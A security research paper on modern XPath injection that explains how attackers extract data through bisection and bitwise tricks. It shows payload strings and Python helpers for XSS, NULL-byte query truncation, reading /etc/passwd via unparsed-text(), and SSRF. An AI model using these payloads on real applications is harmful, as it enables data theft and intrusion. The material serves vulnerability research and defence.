=======================================
Modern XPath Exploitation
=======================================
Ruben Ventura Piña
http://nzt-48.org
@tr3w_
07-20-2023


Abstract
========

Now that XML documents are widely used in modern web applications, XPath injections are becoming more important. XPath 2.0 and XPath 3.1 introduced many new functions to the language. These new functions allow attackers to perform more sophisticated and powerful attacks than the currently public exploitation techniques.

At the time this document was written, all XPath exploitation tools extracted information through very limited techniques such as brute force. The purpose of this paper is to optimize the information extraction process as much as possible and to carry out more damaging attacks such as remote file disclosure, XSS, turning blind injections into visible injections and remote code execution. An exploitation tool has been written as a proof of concept.


Bisection method
----------------

Instead of performing a brute-force attack, it is possible to use a binary search to make the data extraction process much faster.

Before XPath 2.0, the binary search was performed with the contains() function, which tests whether the unknown character belongs to a given subset of the character set. This means that the character set itself has to be sent to the server, and when dealing with non-Latin alphabets such as Japanese this becomes very tedious.

The new function string-to-codepoints() converts characters into their numeric Unicode code points. Combined with the comparison operators "greater than or equal (>=)" and "less than (<)", it can be used to binary-search the value of a character:

    1' and string-to-codepoints(substring(password/text(), 1, 1)) >= %d and string-to-codepoints(substring(password/text(), 1, 1)) < %d and '1

At the time of writing, xcat is the only tool that uses this technique. A more advanced and optimized technique has been designed (see the Bitwise methods section).
Regexp method
-------------

New functions for regular expressions were also added to the language. They can be used as another way to implement the bisection method:

    1' and matches(substring(password/text(), 1, 1), "[A-Z]") and '1

Request after request, the character range is split in half to narrow down the value of the character being extracted.


Bitwise methods
---------------

In 2010, binary-based methods were invented to extract information through SQL injection in an extremely optimized fashion. These methods extract the numeric binary representation of each character one bit at a time. If the page returns the TRUE response, the bit in question is 1; otherwise, the bit is 0.

The advantage of this method is that every request is independent of the others, in contrast to the bisection method, in which each request depends on the previous answer and must be sent sequentially. Thus, all the requests for a character can be performed at once with threads. For 7-bit ASCII characters this means that a character is obtained around 7 times faster than with the bisection method, because all 7 bits are requested at the same time. The injection looks like the following:

    1'and(floor(string-to-codepoints(substring(password/text(),1,1))div %d)mod 2)and'1

Since XPath does not provide bitwise operators, each individual bit is computed by integer-dividing the code point by a power of 2 (0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80) and taking the result modulo 2. For the character 'a' (code point 97):

    floor(97 / 0x01) % 2 = 1    TRUE
    floor(97 / 0x02) % 2 = 0    FALSE
    floor(97 / 0x04) % 2 = 0    FALSE
    floor(97 / 0x08) % 2 = 0    FALSE
    floor(97 / 0x10) % 2 = 0    FALSE
    floor(97 / 0x20) % 2 = 1    TRUE
    floor(97 / 0x40) % 2 = 1    TRUE
    floor(97 / 0x80) % 2 = 0    FALSE

Reading the bits from 0x80 down to 0x01 gives 01100001 = 97 = 'a'.


Detection phase optimization
============================

Blind XPath injections can happen in single-quoted strings, double-quoted strings and numeric contexts.
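To make the three contexts concrete, the sketch below splices input into three hypothetical server-side query templates, the way a vulnerable application concatenates raw input into its query. `TEMPLATES` and `build_query` are illustrative names, not taken from any real application. In the quoted contexts an injected condition only becomes XPath code after it closes the surrounding literal, which is why a different probe is normally needed for each context.

```python
# Hypothetical server-side query templates; {} marks where raw user input
# is spliced in without escaping (the vulnerable pattern).
TEMPLATES = {
    "single": "//user[name/text()='{}']",
    "double": '//user[name/text()="{}"]',
    "numeric": "//user[id={}]",
}


def build_query(context: str, user_input: str) -> str:
    """Return the XPath query a vulnerable application would evaluate."""
    return TEMPLATES[context].format(user_input)


if __name__ == "__main__":
    # In a quoted context the condition must first close the literal;
    # in the numeric context it can be appended directly.
    print(build_query("single", "admin' and '1'='1"))
    print(build_query("double", 'admin" and "1"="1'))
    print(build_query("numeric", "1 and 1"))
```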
Usually, three injections must be made to find out the context of the vulnerable parameter:

    and '1'='1
    and "1"="1
    and 1

This can be improved by using a single polyglot vector that works in every possible context. Instead of three requests, only one is sent, which reduces the number of detection requests by 66%:

    and 1 (: ' and " and '"!='!=":)

Comments in XPath are opened and closed with the (: and :) delimiters. In the numeric context the quotes of the vector are hidden inside such a comment, while in the two quoted contexts they close and reopen string literals, so the resulting query is syntactically valid in all three cases.


Turning XPath injections into Cross-Site Scripting
==================================================

Instead of returning nodes, an XPath expression can also return arbitrary strings defined by the user:

    //root/"this text will be printed"

Although injected code can change the query, in most cases this alone is not enough, because there is always trailing text after the injected value:

    //users/username[username/text()='admin']/"print this text"']/password
    (the trailing ']/password is invalid code)

The only way to inject arbitrary text and have it displayed is to break out of the encapsulation by closing the quote and the bracket, and then modify the rest of the query at will. However, the trailing text after the injection point is a problem, because it either yields invalid code or greatly increases the complexity of the injection. In contrast to SQL, XPath has no single-line comments such as -- and # to ignore the trailing text.

However, I found an undocumented feature in XPath that is useful for discarding trailing text: a NULL byte placed after the injection. It terminates the string and all the trailing characters are ignored; as a result, the attacker controls the output:

    //users/username[username/text()='admin']/""%00']/password

Placing HTML or JavaScript inside the returned string literal turns this into an XSS attack.
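Building such a payload can be sketched in Python under two assumptions: the vulnerable value is sent URL-encoded in a query string, and the target implementation honours the NULL byte terminator (which the author observed in Saxon only). `xpath_string_literal` and `xss_payload` are hypothetical helper names. Since XPath 2.0, a double quote inside a double-quoted string literal is written by doubling it, which lets HTML attributes be embedded without breaking the literal.

```python
from urllib.parse import quote

NUL = "\x00"  # assumed string terminator (observed by the author in Saxon only)


def xpath_string_literal(text: str) -> str:
    """Double-quoted XPath 2.0+ string literal; an embedded " is written as ""."""
    return '"' + text.replace('"', '""') + '"'


def xss_payload(known_value: str, html: str) -> str:
    """Close the quote and predicate, return `html` as a string step, then NUL."""
    return f"{known_value}']/{xpath_string_literal(html)}{NUL}"


if __name__ == "__main__":
    payload = xss_payload("admin", '<img src=x onerror="alert(1)">')
    # URL-encode for a query-string parameter; the NUL becomes %00.
    print(quote(payload, safe=""))
```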
Implementation-dependent comments regarding the NULL byte string terminator
---------------------------------------------------------------------------

As this NULL byte behaviour does not appear in the XPath specifications, it is very likely that it only works in certain XPath implementations. I tested it in the Saxon implementation by Saxonica (http://saxonica.com), but I have not had the chance to test it in other implementations. It would be interesting to find out whether the NULL byte terminator works in all XPath implementations; if someone wants to contribute by testing it in other implementations, the help would be highly appreciated.

List of other XPath implementations: https://en.wikipedia.org/wiki/XPath#Implementations


Turning blind injections into visible injections
================================================

Since there is trailing text after the injection point, the only way to extract nodes other than the ones intended to be displayed used to be blind boolean injection. Given how the NULL byte trick works, it follows that the entire query can be changed and any desired node can be displayed: escape from the predicate brackets, add other selectors at the end, and append a NULL byte so that the rest of the original query is ignored and replaced with whatever statement the attacker wants to execute:

    //username[username/text()='admin']/CreditCardNumber/text()%00']/original-query


Arbitrary file disclosure
=========================

XPath can also be exploited to disclose the contents of arbitrary files on the server. This is achieved with the new unparsed-text() function. The blind injection can be turned into a visible one with the NULL byte trick, so that the original query is replaced and ignored. Thus, the contents of the target file are revealed in full in a single response.
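The payload construction shared by visible injections and file disclosure can be sketched in Python. This is a model, not a real XPath engine: `effective_query` simply assumes that everything after the first NULL byte is discarded, which is the implementation-dependent behaviour described above. `visible_payload`, `effective_query` and the template string are hypothetical.

```python
NUL = "\x00"


def visible_payload(known_value: str, expr: str) -> str:
    """Close the quote and predicate, append the step `expr`, then a NUL byte."""
    return f"{known_value}']/{expr}{NUL}"


def effective_query(template: str, user_input: str) -> str:
    """Model of the assumed behaviour: text after the first NUL is discarded."""
    query = template.format(user_input)
    return query.split(NUL, 1)[0]


if __name__ == "__main__":
    template = "//user[user/text()='{}']/trailing-characters"  # hypothetical
    for expr in ("unparsed-text('/etc/passwd')", "base-uri()"):
        print(effective_query(template, visible_payload("admin", expr)))
```

`known_value` is a parameter because the appended step is evaluated once for each node selected by the original predicate, so it should be a value that matches at least one node.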
    //user[user/text()='break']/unparsed-text('/etc/passwd')%00']/trailing-characters

The unparsed-text() function reads the file and returns its entire contents as a string.

Depending on the XPath implementation, static-base-uri() sometimes returns an empty value, which means that relative URIs cannot be resolved and absolute paths must be used instead; this can be an obstacle. The base-uri() function can be used to print the base URI of the context node, which reveals the location of the queried resource:

    //user[user/text()='break']/base-uri()%00']

The document-uri() function can also be used for this.

If it is not possible to make the blind injection visible (with the NULL byte trick), the contents of files on the server can still be extracted character by character with the bitwise extraction methods.

It is worth noting that, at the time of writing, xcat (the most popular tool) had recently been updated to include this functionality. However, in my tests this module had a lot of bugs and did not work most of the time (at least on my computer).


Server-Side Request Forgery
===========================

It is also possible to make the server send requests to any host by passing an HTTP URL to the doc(), doc-available(), unparsed-text() or unparsed-text-available() functions. The request is issued by the server, on its behalf.


Proof-Of-Concept
================

An XPath exploitation tool that implements the bitwise bit-anding method has been written:

    http://nzt-48.org/tools/


Appendix
========

The specification of the XPath functions can be found here:

    https://www.w3.org/TR/xpath-functions-31/

Links to other XPath injection tools (most of them are very old):

    xcat                  https://github.com/orf/xcat
    xxxpwn                https://github.com/feakk/xxxpwn
    xpath-blind-explorer  https://github.com/micsoftvn/xpath-blind-explorer
    XMLCHOR               https://github.com/Harshal35/XMLCHOR/